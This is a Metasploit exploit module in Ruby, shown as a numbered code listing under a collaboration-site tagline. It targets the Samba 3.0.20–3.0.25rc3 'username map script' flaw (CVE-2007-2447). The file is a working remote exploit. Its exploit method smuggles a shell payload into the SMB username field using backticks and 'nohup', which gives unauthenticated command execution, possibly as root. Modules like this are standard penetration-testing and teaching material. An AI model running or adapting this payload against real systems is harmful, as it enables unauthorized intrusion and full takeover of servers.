Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::SMB::Client
10

11
  # For our customized version of session_setup_no_ntlmssp
12
  CONST = Rex::Proto::SMB::Constants
13
  CRYPT = Rex::Proto::SMB::Crypt
14

15
  def initialize(info = {})
16
    super(update_info(info,
17
      'Name'           => 'Samba "username map script" Command Execution',
18
      'Description'    => %q{
19
          This module exploits a command execution vulnerability in Samba
20
        versions 3.0.20 through 3.0.25rc3 when using the non-default
21
        "username map script" configuration option. By specifying a username
22
        containing shell meta characters, attackers can execute arbitrary
23
        commands.
24

25
        No authentication is needed to exploit this vulnerability since
26
        this option is used to map usernames prior to authentication!
27
      },
28
      'Author'         => [ 'jduck' ],
29
      'License'        => MSF_LICENSE,
30
      'References'     =>
31
        [
32
          [ 'CVE', '2007-2447' ],
33
          [ 'OSVDB', '34700' ],
34
          [ 'BID', '23972' ],
35
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
36
          [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
37
        ],
38
      'Platform'       => ['unix'],
39
      'Arch'           => ARCH_CMD,
40
      'Privileged'     => true, # root or nobody user
41
      'Payload'        =>
42
        {
43
          'Space'    => 1024,
44
          'DisableNops' => true,
45
          'Compat'      =>
46
            {
47
              'PayloadType' => 'cmd',
48
              # *_perl and *_ruby work if they are installed
49
              # mileage may vary from system to system..
50
            }
51
        },
52
      'Targets'        =>
53
        [
54
          [ "Automatic", { } ]
55
        ],
56
      'DefaultTarget'  => 0,
57
      'DisclosureDate' => '2007-05-14'))
58

59
    register_options(
60
      [
61
        Opt::RPORT(139)
62
      ])
63

64
    deregister_options('SMB::ProtocolVersion')
65
  end
66

67

68
  def exploit
69

70
    vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')
71
    connect(versions: [1])
72

73
    # lol?
74
    username = "/=`nohup " + payload.encoded + "`"
75
    begin
76
      simple.client.negotiate(false)
77
      simple.client.session_setup_no_ntlmssp(username, rand_text(16), datastore['SMBDomain'], false)
78
    rescue ::Timeout::Error, XCEPT::LoginError
79
      # nothing, it either worked or it didn't ;)
80
    end
81

82
    handler
83
  end
84
end
85

86